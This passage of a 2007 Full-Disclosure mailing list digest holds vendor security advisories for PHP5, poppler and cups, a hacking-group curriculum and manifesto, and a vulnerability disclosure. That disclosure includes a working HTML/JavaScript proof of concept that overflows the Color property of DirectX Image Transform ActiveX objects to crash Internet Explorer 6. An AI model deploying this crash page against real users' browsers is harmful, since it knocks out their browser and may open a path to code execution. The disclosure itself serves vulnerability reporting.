http://www.h2hc.org.br/repositorio.php



cya,


Rodrigo (BSDaemon).

--
http://www.kernelhacking.com/rodrigo

Kernel Hacking: If i really know, i can hack

GPG KeyID: 1FCEDEA1



________________________________________________
Message sent using UebiMiau 2.7.2



------------------------------

Message: 6
Date: Mon, 19 Nov 2007 15:06:46 -0500
From: rPath Update Announcements <announce-noreply () rpath com>
Subject: [Full-disclosure] rPSA-2007-0242-1 php5 php5-cgi php5-
mysql
      php5-pear php5-pgsql php5-soap php5-xsl
To: security-announce () lists rpath com,
      update-announce () lists rpath com,     product-announce () lists rpath com
Cc: lwn () lwn net, full-disclosure () lists grok org uk,
      vulnwatch () vulnwatch org,     bugtraq () securityfocus com
Message-ID: <4741ecd6.po1y971Bh5Pxcrhi%announce-noreply () rpath com>
Content-Type: text/plain; charset=us-ascii

rPath Security Advisory: 2007-0242-1
Published: 2007-11-19
Products:
   rPath Appliance Platform Linux Service 1
   rPath Linux 1

Rating: Minor
Exposure Level Classification:
   Remote Deterministic Denial of Service
Updated Versions:
   php5=conary.rpath.com () rpl:1/5.2.5-1-1
   php5-cgi=conary.rpath.com () rpl:1/5.2.5-1-1
   php5-mysql=conary.rpath.com () rpl:1/5.2.5-1-1
   php5-pear=conary.rpath.com () rpl:1/5.2.5-1-1
   php5-pgsql=conary.rpath.com () rpl:1/5.2.5-1-1
   php5-soap=conary.rpath.com () rpl:1/5.2.5-1-1
   php5-xsl=conary.rpath.com () rpl:1/5.2.5-1-1

rPath Issue Tracking System:
   https://issues.rpath.com/browse/RPL-1943

References:
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4887
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4783
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4840
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5900

Description:
   Previous versions of the php5 package contain multiple 
vulnerabilities,
   the most serious of which involve several Denial of Service 
attacks
   (application crashes and temporary application hangs).  It is 
not
   currently known that these vulnerabilities can be exploited to 

execute
   malicious code.
   
   In its default configuration, rPath Linux 1 does not install 
php5 and
   is thus not vulnerable; however, systems upon which php5 and 
an exposed
   application have been installed may be vulnerable.

http://wiki.rpath.com/Advisories:rPSA-2007-0242

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-
license.html



------------------------------

Message: 7
Date: Mon, 19 Nov 2007 17:30:32 -0500 (GMT-05:00)
From: Elazar Broad <elazarb () earthlink net>
Subject: [Full-disclosure] Multiple stack-based buffer overflows 
in
      dxmsft.dll
To: "full-disclosure () lists grok org uk"
      <full-disclosure () lists grok org uk>
Message-ID:
      <30247048.1195511432439.JavaMail.root () elwamui-
norfolk.atl.sa.earthlink.net>
      
Content-Type: text/plain; charset=UTF-8

There are multiple stack overflows in dxmsft.dll version 
6.3.2900.3199(Image DirectX Transforms). This DLL exposes DirectX 
Image Transform objects which are safe for scripting. The issue is 

with the Color property of certain objects, so I am assuming this 
property is inherited from a base interface.
This affects WindowsXP SP2 IE6(fully patched), I have not tested 
this on
IE7 and it does not appear to affect Windows Server 2003 R2 
SP2(newer version of the dxmsft.dll). I have not tested code 
execution, though it may be possible. I received the following 
response from Microsoft:

---
From our investigation this issue was found to be a stability 
problem which is not exploitable. The net effect of this issue is 
that IE will become unresponsive. The underlying operating system 
will still respond and Killing the process will stop the local 
DoS.
---

It did not hang IE on my machine, but instead crashed IE with a 
stack overflow. 
This may be related to http://www.securityfocus.com/bid/19029/.

PoC as follows:

---------------------
<!--
written by e.b.
-->
<html>
<head>
 <script language="JavaScript" DEFER>
   function Check() {
    var s = "AAAA";

    while (s.length < 999999) s=s+s;

   var obj = new 
ActiveXObject("DXImageTransform.Microsoft.Chroma");
    obj.color = s;

   var obj = new 
ActiveXObject("DXImageTransform.Microsoft.DropShadow");
    obj.color = s;

   var obj = new 
ActiveXObject("DXImageTransform.Microsoft.Glow");
    obj.color = s;

   var obj = new 
ActiveXObject("DXImageTransform.Microsoft.MaskFilter");
    obj.color = s;

   var obj = new 
ActiveXObject("DXImageTransform.Microsoft.Shadow");
    obj.color = s;

  }
 </script>

</head>
<body onload="JavaScript: return Check();" />
</html>
---------------------

Elazar



------------------------------

Message: 8
Date: Mon, 19 Nov 2007 19:12:41 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:227 ] - Updated poppler
      packages fix    vulnerabilities
To: full-disclosure () lists grok org uk
Message-ID: <E1IuIbR-0008H5-79 () artemis annvix ca>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


__________________________________________________________________
_____

Mandriva Linux Security Advisory                         MDKSA-
2007:227
http://www.mandriva.com/security/

__________________________________________________________________
_____

Package : poppler
Date    : November 19, 2007
Affected: 2007.1, 2008.0, Corporate 4.0

__________________________________________________________________
_____

Problem Description:

Alin Rad Pop found several flaws in how PDF files are handled
in poppler.  An attacker could create a malicious PDF file that
would cause poppler to crash or potentially execute arbitrary 
code
when opened.

The updated packages have been patched to correct this issue.

__________________________________________________________________
_____

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393

__________________________________________________________________
_____

Updated Packages:

Mandriva Linux 2007.1:
9f040875778bb940669bd2bfdbef248c  2007.1/i586/libpoppler-qt1-
0.5.4-3.3mdv2007.1.i586.rpm
804046d0a838cb3a0a5e355fb118b1bc  2007.1/i586/libpoppler-qt1-
devel-0.5.4-3.3mdv2007.1.i586.rpm
dd83d0b61f2ad91ea79f314752a0f514  2007.1/i586/libpoppler-qt4-1-
0.5.4-3.3mdv2007.1.i586.rpm
05d0deb14ec5dad80d8d400756b3d183  2007.1/i586/libpoppler-qt4-1-
devel-0.5.4-3.3mdv2007.1.i586.rpm
a23fb37129c8756e353fe47be6d6a8be  2007.1/i586/libpoppler1-0.5.4-
3.3mdv2007.1.i586.rpm
6db198b349d7ebe355d809732ddb21bb  2007.1/i586/libpoppler1-devel-
0.5.4-3.3mdv2007.1.i586.rpm
3e280873492799bebdec28872351052e  2007.1/i586/poppler-0.5.4-
3.3mdv2007.1.i586.rpm 
40600d9ccb1e7f7a76cb4ccf447e9e40  2007.1/SRPMS/poppler-0.5.4-
3.3mdv2007.1.src.rpm

Mandriva Linux 2007.1/X86_64:
b49094eb08c809397081d357f7251166  2007.1/x86_64/lib64poppler-qt1-
0.5.4-3.3mdv2007.1.x86_64.rpm
e6f52d8bb5d9f84458ae6892cd7800da  2007.1/x86_64/lib64poppler-qt1-
devel-0.5.4-3.3mdv2007.1.x86_64.rpm
4d08d7343c94a016928cef93490af098  2007.1/x86_64/lib64poppler-qt4-
1-0.5.4-3.3mdv2007.1.x86_64.rpm
b0f8d4b4c5f1917c61687900a119e685  2007.1/x86_64/lib64poppler-qt4-
1-devel-0.5.4-3.3mdv2007.1.x86_64.rpm
0955492bd1319fdc2e74c2528994e2bc  2007.1/x86_64/lib64poppler1-
0.5.4-3.3mdv2007.1.x86_64.rpm
f918b50ec88a2aca954c156c33c605e8  2007.1/x86_64/lib64poppler1-
devel-0.5.4-3.3mdv2007.1.x86_64.rpm
24fdcc57f5c7481e6732f45e43e49d51  2007.1/x86_64/poppler-0.5.4-
3.3mdv2007.1.x86_64.rpm 
40600d9ccb1e7f7a76cb4ccf447e9e40  2007.1/SRPMS/poppler-0.5.4-
3.3mdv2007.1.src.rpm

Mandriva Linux 2008.0:
840730bb310636d43a3d07a6d4d4f281  2008.0/i586/libpoppler-devel-
0.6-3.1mdv2008.0.i586.rpm
9d6109683ae8729ad549c56d2f8998c1  2008.0/i586/libpoppler-glib-
devel-0.6-3.1mdv2008.0.i586.rpm
b69e7e912fe2f532c5a9ed7c3687eb42  2008.0/i586/libpoppler-glib2-
0.6-3.1mdv2008.0.i586.rpm
cea89e4b36cbe99060e3568038474078  2008.0/i586/libpoppler-qt-devel-

0.6-3.1mdv2008.0.i586.rpm
64a459904bf417570e4f2b8e0d550c77  2008.0/i586/libpoppler-qt2-0.6-
3.1mdv2008.0.i586.rpm
5d1c9970275811b934599f95b5264d7d  2008.0/i586/libpoppler-qt4-2-
0.6-3.1mdv2008.0.i586.rpm
7bbfdb4209d40f503bedc8e10e4687df  2008.0/i586/libpoppler-qt4-
devel-0.6-3.1mdv2008.0.i586.rpm
812e34a9b25b4e28169bf84804da8325  2008.0/i586/libpoppler2-0.6-
3.1mdv2008.0.i586.rpm
57380d8dcef7e2b404ed6a7571969bfe  2008.0/i586/poppler-0.6-
3.1mdv2008.0.i586.rpm 
697118d63ace272626e64555f7b8cffd  2008.0/SRPMS/poppler-0.6-
3.1mdv2008.0.src.rpm

Mandriva Linux 2008.0/X86_64:
f64a05a64b742ac4a40a07b8c43b9545  2008.0/x86_64/lib64poppler-
devel-0.6-3.1mdv2008.0.x86_64.rpm
5d9963749a1315a570e9a70783c078da  2008.0/x86_64/lib64poppler-glib-

devel-0.6-3.1mdv2008.0.x86_64.rpm
8d62d129c9279da1ed306a02785d5a7f  2008.0/x86_64/lib64poppler-
glib2-0.6-3.1mdv2008.0.x86_64.rpm
f844c25e098d3b295cba161a07795b36  2008.0/x86_64/lib64poppler-qt-
devel-0.6-3.1mdv2008.0.x86_64.rpm
5bfdd34b678a33aeebeec9dc7b0d0dd7  2008.0/x86_64/lib64poppler-qt2-
0.6-3.1mdv2008.0.x86_64.rpm
83334372f43c893ca9afdaefdd7b90d0  2008.0/x86_64/lib64poppler-qt4-
2-0.6-3.1mdv2008.0.x86_64.rpm
82099121bfc50561cb3a175d9d31152b  2008.0/x86_64/lib64poppler-qt4-
devel-0.6-3.1mdv2008.0.x86_64.rpm
59a614072521db19cd3b502e6d49959a  2008.0/x86_64/lib64poppler2-0.6-

3.1mdv2008.0.x86_64.rpm
0a5a8795e93dc014c5f07e2ab6e73393  2008.0/x86_64/poppler-0.6-
3.1mdv2008.0.x86_64.rpm 
697118d63ace272626e64555f7b8cffd  2008.0/SRPMS/poppler-0.6-
3.1mdv2008.0.src.rpm

Corporate 4.0:
86be8a80003ab4c7a36905eac276dbf6  corporate/4.0/i586/libpoppler-
qt0-0.4.1-3.6.20060mlcs4.i586.rpm
32bae8fecaa6ec4e2b1e7e68458f889b  corporate/4.0/i586/libpoppler-
qt0-devel-0.4.1-3.6.20060mlcs4.i586.rpm
e9aefa230a3c897361330d91583eb4b9  corporate/4.0/i586/libpoppler0-
0.4.1-3.6.20060mlcs4.i586.rpm
280a9f7aea1b3766864996d5969e69ea  corporate/4.0/i586/libpoppler0-
devel-0.4.1-3.6.20060mlcs4.i586.rpm 
aab471f88ae46303acfef45c3464bce6  corporate/4.0/SRPMS/poppler-
0.4.1-3.6.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
62f84dc6ac78997484c76c0e34c74063  
corporate/4.0/x86_64/lib64poppler-qt0-0.4.1-
3.6.20060mlcs4.x86_64.rpm
5fda381aed07c4eaa47f48d7187449ee  
corporate/4.0/x86_64/lib64poppler-qt0-devel-0.4.1-
3.6.20060mlcs4.x86_64.rpm
6abf5b15ba6ffa847dde37a2d0f049d0  
corporate/4.0/x86_64/lib64poppler0-0.4.1-3.6.20060mlcs4.x86_64.rpm
bcbad9d141f0b9615740d5f027a24699  
corporate/4.0/x86_64/lib64poppler0-devel-0.4.1-
3.6.20060mlcs4.x86_64.rpm 
aab471f88ae46303acfef45c3464bce6  corporate/4.0/SRPMS/poppler-
0.4.1-3.6.20060mlcs4.src.rpm

__________________________________________________________________
_____

To upgrade automatically use MandrivaUpdate or urpmi.  The 
verification
of md5 checksums and GPG signatures is performed automatically 
for you.

All packages are signed by Mandriva for security.  You can obtain 

the
GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com

__________________________________________________________________
_____

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
 <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHQhenmqjQ0CJFipgRAl9SAJ9gU0uhZwFvHZ9tF4z8F15VUgUfNwCgjOhN
XrZ88C4TwK/FkZL+zC+zOLU=
=ehqr
-----END PGP SIGNATURE-----



------------------------------

Message: 9
Date: Mon, 19 Nov 2007 19:23:22 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:228 ] - Updated cups 
packages
      fix     vulnerabilities
To: full-disclosure () lists grok org uk
Message-ID: <E1IuIlm-0008OR-55 () artemis annvix ca>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


__________________________________________________________________
_____

Mandriva Linux Security Advisory                         MDKSA-
2007:228
http://www.mandriva.com/security/

__________________________________________________________________
_____

Package : cups
Date    : November 19, 2007
Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0

__________________________________________________________________
_____

Problem Description:

Alin Rad Pop found several flaws in how PDF files are handled in 
cups.
An attacker could create a malicious PDF file that would cause 
cups
to crash or potentially execute arbitrary code when opened.

The updated packages have been patched to correct this issue.

__________________________________________________________________
_____

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393

__________________________________________________________________
_____

Updated Packages:

Mandriva Linux 2007.0:
4fd4b6a2d384e2cc599b415131a58edd  2007.0/i586/cups-1.2.4-
1.5mdv2007.0.i586.rpm
29fd652c383d4ea688336bc143f1e5cf  2007.0/i586/cups-common-1.2.4-
1.5mdv2007.0.i586.rpm
6a6c275bf900887bc34325ef552f39ab  2007.0/i586/cups-serial-1.2.4-
1.5mdv2007.0.i586.rpm
b2f487a129a0ae8cefd66bd89177f5bd  2007.0/i586/libcups2-1.2.4-
1.5mdv2007.0.i586.rpm
853850aadbfed2e7a5fe76ddfd293990  2007.0/i586/libcups2-devel-
1.2.4-1.5mdv2007.0.i586.rpm
cdeaa28956923402a8986821fb01ec53  2007.0/i586/php-cups-1.2.4-
1.5mdv2007.0.i586.rpm 
5152934e9233e36bd1308d36144bbc1c  2007.0/SRPMS/cups-1.2.4-
1.5mdv2007.0.src.rpm

Mandriva Linux 2007.0/X86_64:
7df3b74de7c7d06ca7e750912993b85a  2007.0/x86_64/cups-1.2.4-
1.5mdv2007.0.x86_64.rpm
7c8463926c7a618df34b5e31ddb3b80f  2007.0/x86_64/cups-common-1.2.4-

1.5mdv2007.0.x86_64.rpm
49b51564f1e7ce0df1da99f7f86bff3c  2007.0/x86_64/cups-serial-1.2.4-

1.5mdv2007.0.x86_64.rpm
e6c50f4ec69f14569036549ee1402beb  2007.0/x86_64/lib64cups2-1.2.4-
1.5mdv2007.0.x86_64.rpm
0d4f42989dc3604a551cf1f9f4bb1c76  2007.0/x86_64/lib64cups2-devel-
1.2.4-1.5mdv2007.0.x86_64.rpm
8a9a47b66a117d76b6612ac247ee76fb  2007.0/x86_64/php-cups-1.2.4-
1.5mdv2007.0.x86_64.rpm 
5152934e9233e36bd1308d36144bbc1c  2007.0/SRPMS/cups-1.2.4-
1.5mdv2007.0.src.rpm

Mandriva Linux 2007.1:
8bca1f69b483c9907b164d090bf71161  2007.1/i586/cups-1.2.10-
2.3mdv2007.1.i586.rpm
8d84223e130eb9039dd5e25dfcf47684  2007.1/i586/cups-common-1.2.10-
2.3mdv2007.1.i586.rpm
c73459d19f605e2093fe8e7753510cf8  2007.1/i586/cups-serial-1.2.10-
2.3mdv2007.1.i586.rpm
9f4e634eb3e900ffefd59562780a3f28  2007.1/i586/libcups2-1.2.10-
2.3mdv2007.1.i586.rpm
fd0883a8e8243ff1ceb862f14b9f032b  2007.1/i586/libcups2-devel-
1.2.10-2.3mdv2007.1.i586.rpm
bbb9b69f0e77c2e89f82328fa96a254f  2007.1/i586/php-cups-1.2.10-
2.3mdv2007.1.i586.rpm 
a9694fcccc09b5fc3e0ab17acff8c857  2007.1/SRPMS/cups-1.2.10-
2.3mdv2007.1.src.rpm

Mandriva Linux 2007.1/X86_64:
b1ae2a278de78e5e90cd818af06c8869  2007.1/x86_64/cups-1.2.10-
2.3mdv2007.1.x86_64.rpm
feb3659cf805bbb8d7d528ec00007416  2007.1/x86_64/cups-common-
1.2.10-2.3mdv2007.1.x86_64.rpm
f10bf7760a46b9bf195d0ee2f0b20ad0  2007.1/x86_64/cups-serial-
1.2.10-2.3mdv2007.1.x86_64.rpm
7dccd2d2bd22194c72821a2315be71f0  2007.1/x86_64/lib64cups2-1.2.10-

2.3mdv2007.1.x86_64.rpm
1690756e08eed05d08b9b1dad4554a69  2007.1/x86_64/lib64cups2-devel-
1.2.10-2.3mdv2007.1.x86_64.rpm
9d0f9f960a4e171d5b69a51650a0e97c  2007.1/x86_64/php-cups-1.2.10-
2.3mdv2007.1.x86_64.rpm 
a9694fcccc09b5fc3e0ab17acff8c857  2007.1/SRPMS/cups-1.2.10-
2.3mdv2007.1.src.rpm

Mandriva Linux 2008.0:
fb82aaf844538f1192dc5a5bba48ebb2  2008.0/i586/cups-1.3.0-
3.3mdv2008.0.i586.rpm
0f32262c9fd557a33653d346cf561eb0  2008.0/i586/cups-common-1.3.0-
3.3mdv2008.0.i586.rpm
679603be0ff46880b67a8a526fc5e0f6  2008.0/i586/cups-serial-1.3.0-
3.3mdv2008.0.i586.rpm
2c475b6dbc51abb97f4978fb38f805aa  2008.0/i586/libcups2-1.3.0-
3.3mdv2008.0.i586.rpm
c8bfa0b793dc2f75c15f19e4822bb02d  2008.0/i586/libcups2-devel-
1.3.0-3.3mdv2008.0.i586.rpm
002037d0c0296df0f488b6827abd3621  2008.0/i586/php-cups-1.3.0-
3.3mdv2008.0.i586.rpm 
81a92819ff1b95379e68d0b92022ef31  2008.0/SRPMS/cups-1.3.0-
3.3mdv2008.0.src.rpm

Mandriva Linux 2008.0/X86_64:
908ceb359b83acc57734a535e1b7b7a5  2008.0/x86_64/cups-1.3.0-
3.3mdv2008.0.x86_64.rpm
3ef9fbbffa74d7ea35ec501c074f6195  2008.0/x86_64/cups-common-1.3.0-

3.3mdv2008.0.x86_64.rpm
b29c75dd2616451c33800772d77f6d22  2008.0/x86_64/cups-serial-1.3.0-

3.3mdv2008.0.x86_64.rpm
7bc26d62f62bebfd13f748a3e1c92f40  2008.0/x86_64/lib64cups2-1.3.0-
3.3mdv2008.0.x86_64.rpm
bd7fca05e68b64f71532007f0d3336b6  2008.0/x86_64/lib64cups2-devel-
1.3.0-3.3mdv2008.0.x86_64.rpm
f8a5c7b8727652c48080c7d42ebbbb98  2008.0/x86_64/php-cups-1.3.0-
3.3mdv2008.0.x86_64.rpm 
81a92819ff1b95379e68d0b92022ef31  2008.0/SRPMS/cups-1.3.0-
3.3mdv2008.0.src.rpm

Corporate 3.0:
d8f8b23034ed04134c3adffe8900c3c0  corporate/3.0/i586/cups-1.1.20-
5.14.C30mdk.i586.rpm
692d4cc10f27d0b032414bd49047a0d5  corporate/3.0/i586/cups-common-
1.1.20-5.14.C30mdk.i586.rpm
f51f15805a46410360a735d266b05513  corporate/3.0/i586/cups-serial-
1.1.20-5.14.C30mdk.i586.rpm
ac8c8341c807fe425b95b2d36e540632  corporate/3.0/i586/libcups2-
1.1.20-5.14.C30mdk.i586.rpm
9e4381efa99b4259291d83ce12fbbfd1  corporate/3.0/i586/libcups2-
devel-1.1.20-5.14.C30mdk.i586.rpm 
dbb2486013936d7ac79996b437871851  corporate/3.0/SRPMS/cups-1.1.20-

5.14.C30mdk.src.rpm

Corporate 3.0/X86_64:
af60c4b209e2d7c8b2926152484d7a16  corporate/3.0/x86_64/cups-
1.1.20-5.14.C30mdk.x86_64.rpm
04723ab4e6928c7c94509970ee3affe5  corporate/3.0/x86_64/cups-
common-1.1.20-5.14.C30mdk.x86_64.rpm
633e04aa6a1a94e4c16ff06b80c5b0a1  corporate/3.0/x86_64/cups-
serial-1.1.20-5.14.C30mdk.x86_64.rpm
8455649b95bd3ccbbbd83643355d0d9d  corporate/3.0/x86_64/lib64cups2-

1.1.20-5.14.C30mdk.x86_64.rpm
b0bb5f82abe5e63f2330a2ce3856d9fd  corporate/3.0/x86_64/lib64cups2-

devel-1.1.20-5.14.C30mdk.x86_64.rpm 
dbb2486013936d7ac79996b437871851  corporate/3.0/SRPMS/cups-1.1.20-

5.14.C30mdk.src.rpm

Corporate 4.0:
601bc4824031861920955ad8555aa4d7  corporate/4.0/i586/cups-1.2.4-
0.5.20060mlcs4.i586.rpm
47167ce1b770bf583616d86a06e4b434  corporate/4.0/i586/cups-common-
1.2.4-0.5.20060mlcs4.i586.rpm
8b12a32bd46ce350143b1722dbf76de2  corporate/4.0/i586/cups-serial-
1.2.4-0.5.20060mlcs4.i586.rpm
7bded05fbaf5b485aef109404f0132f9  corporate/4.0/i586/libcups2-
1.2.4-0.5.20060mlcs4.i586.rpm
09c2660b9004454c07b15d3e57124acc  corporate/4.0/i586/libcups2-
devel-1.2.4-0.5.20060mlcs4.i586.rpm
55eddc1759513c131465e61564977618  corporate/4.0/i586/php-cups-
1.2.4-0.5.20060mlcs4.i586.rpm 
3a2b57f8a67c419bc74f09db58b6e789  corporate/4.0/SRPMS/cups-1.2.4-
0.5.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
1e3565148aa5da08a4b999b42d7763c8  corporate/4.0/x86_64/cups-1.2.4-

0.5.20060mlcs4.x86_64.rpm
a1da7ffbc6fb5294967fde1b785dc7fa  corporate/4.0/x86_64/cups-
common-1.2.4-0.5.20060mlcs4.x86_64.rpm
306ffbfbf7606ffc31c197f77c539eef  corporate/4.0/x86_64/cups-
serial-1.2.4-0.5.20060mlcs4.x86_64.rpm
f0364ad9115ceb82978847ab6cdc66e1  corporate/4.0/x86_64/lib64cups2-

1.2.4-0.5.20060mlcs4.x86_64.rpm
d93d6cb48d60436c9f1b32181f82b6c7  corporate/4.0/x86_64/lib64cups2-

devel-1.2.4-0.5.20060mlcs4.x86_64.rpm
802a3f4c3167f06640d2a8c3394cb26c  corporate/4.0/x86_64/php-cups-
1.2.4-0.5.20060mlcs4.x86_64.rpm 
3a2b57f8a67c419bc74f09db58b6e789  corporate/4.0/SRPMS/cups-1.2.4-
0.5.20060mlcs4.src.rpm

__________________________________________________________________
_____

To upgrade automatically use MandrivaUpdate or urpmi.  The 
verification
of md5 checksums and GPG signatures is performed automatically 
for you.

All packages are signed by Mandriva for security.  You can obtain 

the
GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com

__________________________________________________________________
_____

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
 <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHQhlDmqjQ0CJFipgRAs6VAJ0Z1CEZIWu9sWiiexjGtC+JUXXXMACgo44W
z5jyh/u/+4QFVsSocymKj/g=
=RkrY
-----END PGP SIGNATURE-----



------------------------------

Message: 10
Date: Tue, 20 Nov 2007 07:09:46 +0100
From: rchrafe <rchrafe () gmail com>
Subject: [Full-disclosure] Tha Manual.
To: full-disclosure () lists grok org uk
Message-ID: <47427A2A.5060905 () gmail com>
Content-Type: text/plain; charset=windows-1252; format=flowed

Tha manual.


We do not care about you, or your affilates.
We are in position, and a new army has emerged.
The first of a set of manuals, being provided as follows shall be 
provided wherein those who maintain an interest in the power of 
the 
simplicity of man.
The Manual
Written by d4rk1v4n, part of the rchrafe crime wave.
Notes: We are the rchrafe, you are pathetic
You must learn assembly.
It must be the breakpoint for any other language, high-level or 
low-level and integral learning processes.
It will be assumed that a thorough course in C Programming and 
Assembly 
must first commence.
Also after which a basic, yet thourough understanding of Logic 
Gates, 
which will be provided as articles following the manual.
This guide is a perfected manual, crisp with only the intent to 
create 
an army of elite.
Simply to intervene.
Mod 1: Kernel Design
{
Operating System Concepts Chapters 1-3 5-13
Linux Kernel 2.4 Chapters 1-13
Shellcode
Stack Overflows
Format string exploitation
Integer Overflows
Race Conditions (files)
Kernel Exploitation (Linux)
Kernel patching (Linux)
Kernel rootkit (Linux)
linux process patching
dlmalloc exploitation (partial analysis of 6 thousand line src)
raw sockets, hping2
i/o multiplexing
pthreads
ELF executable format
OS Fingerprinting
IRC Protocol RFC
SMTP Protocol
ICMP Protocol
POP3 protocol
}
Mod 2: Algorithms & Data Structures
{
Computer Organization Hardware/Software Int. chapters 1-6
FreeBSD Design And Implementation chapters 1-6, 8, 12, 13
Algorithms And Data structures (Sedgwick, knuth, whale)
Linux TCPIP Implementation
Linux Synchronization analysis
Linux ext3 analysis
Linux kmalloc analysis
Threads
Mandatory Access Control Models (Selinux,grsec,trustedbsd, dod85)
Role Based Access Control (rsbac for linux)
Buffer overflow Protection
MIPS ASM
Computer Networks - Tanenbaum
C++ (full)
Perl
phkmalloc exploitation
advanced dlmalloc exploitation
advanced fmt string exploitation
advanced race conditions (double free, etc)
freebsd kernel exploitation
freebsd kernel rootkit
cisco protocols (IGRP, EIGRP, BGP, OSPF, IS-IS)
TCP RFC
IP RFC
IPSEC RFC
DNS specification
HTTP specification
IMAP specification
SSL 3 specification
Kerberos
asynch i/o
perl exploitation
php exploitation
sql injection
win32 API
PE executable format
windows ring 3 hacks
IDA/Softice work
binary encryption
polymorphic shellcode
WIN DCOM
ONE RPC Specification
}
Mod 3: Large source analysis
{
400-500 Thousand lines of src analysis
Solaris Kernel internals book
Sparc ASM
windows kernel analysis & exploitation
Prolog
Artificial Intelligence
Compilers
SIMD
ISP Design
Database Design ISBN: 0321204484
Sysvmalloc exploitation
IOS malloc exploitation
RTL malloc exploitation
kmalloc exploitation
ATM
VPN?s
DecNet
Cryptography
Linear algebra
}
Level 4: Parallelism, Distributiveness, Diversity
{
OpenVMS Scheduler ISBN: 1555581560
OpenVMS Memory Managment ISBN: 1555581595
Real Time Scheduling Design ISBN: 0387231374
HP-UX Kernel internals ISBN: 0130328618
Distributed Operating Systems ISBN: 0132199084
VHDL ISBN: 0471899720
Verilog
Designing a MAC Model (like selinux)
Designing BOF Protection (like PAX)
Parallel Architectures
Parallel Algorithm Design
Advanced Artificial Intelligence
Alpha
PowerPC
PA-RISC
ARM
M68K
OpenVMS using
HP-UX using
Digital Image Processing
Digital Signal Processing
Electrical Engineering Basics
Circuit Board Design
}
The rchrafe will resume tutorials of the Mod 1 on the 1st of 
December 
2007, in the channel #crx under irc.efnet.org/pl/ru
We will not accommodate stupidity.
The key will be revealed on rchrafe.wordpress.com at midnight, the 

1st 
of december 2007 for all to join!

Well will rise!



------------------------------

Message: 11
Date: Tue, 20 Nov 2007 07:13:02 +0100
From: rchrafe <rchrafe () gmail com>
Subject: [Full-disclosure] The Call to Reason
To: full-disclosure () lists grok org uk
Message-ID: <47427AEE.2060404 () gmail com>
Content-Type: text/plain; charset=windows-1252; format=flowed

?The Call to Reason.?
By the rhcrafe Senior seat of officials.
BEHOLD AND WITNESS, those who read this document, this which
is the official PROCLAMATION and LETTER OF INTENT concerning
the future of RCHRAFE and RCHRAFE member states; the words within
are no less than the movement of RCHRAFE from its widely
admired position in the computer underground to an overt
existence as a world renowned hacking into computer machines 
authority.
REGARDING the current social state of hacking into computer
machines, RCHRAFE takes no stance. As an autonomous body
with goals unrelated to what is largely considered ?the
hacking community?, RCHRAFE recognizes no entities nor social
classes other than RCHRAFE and anti-RCHRAFE. Abstract concepts
such as ?black hat? and ?white hat? do thus not exist in
the lexicon of RCHRAFE politics, and are irrelevant to our goals.
What then, are the goals and motivations of this powerful
force that has developed over the years, that has come
to be known as RCHRAFE? No less than the subjugation of
power in the computer machine community. It is at this
time appropriate to state COMMUNIQUE POINT NUMBER ONE:
?RCHRAFE DOES NOT AFFILIATE IN CONCEPT WITH ANY EXISTING
POLITICAL OR SOCIAL ENTITIES. RCHRAFE IS IN AND OF ITSELF,
A SOCIAL PHENOMENON OF ADEQUATE STATURE TO STAND WITHOUT
ASSISTANCE OR AFFILIATION.?
It should be pointed out that although RCHRAFE has strong
ties to the American Republican Party and political
republican ideology, we do not participate actively
in government politics of any kind.
PERTAINING TO the overall goals of RCHRAFE as an organization
and the pervasive RCHRAFE social movement, we have distinct
purpose and bearing.
While RCHRAFE assimilates no political or social goals in
and of themselves, we reserve the right to voice opinion
when political or social policies or activities relate
to these aforementioned goals.
These goals, stated, comprise COMMUNIQUE POINT NUMBER
TWO:
?RCHRAFE EXISTS ENTIRELY FOR THE ADVANCEMENT OF MEMBERS,
MEMBER INTEREST, AND HAQING INTO COMPUTER MACHINES.?
We may surmise in corollary then, by the combined
observations of communique points one and two, that RCHRAFE
is in definition a usurping entity, and will tend to
remain benign concerning rival computer groups.
TO CONCLUDE, RCHRAFE will exist as long as the interests
of the corollaries are subject to external change. We
reserve the right to maintain the status of RCHRAFE and
the goals of the corollaries by any mean necessary, but
never by exceeding necessary means.
We Shall Rise!



------------------------------

Message: 12
Date: Tue, 20 Nov 2007 07:33:09 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] How to become a Computer Security
      Professional ?
To: worried security <worriedsecurity () googlemail com>
Cc: full-disclosure () lists grok org uk
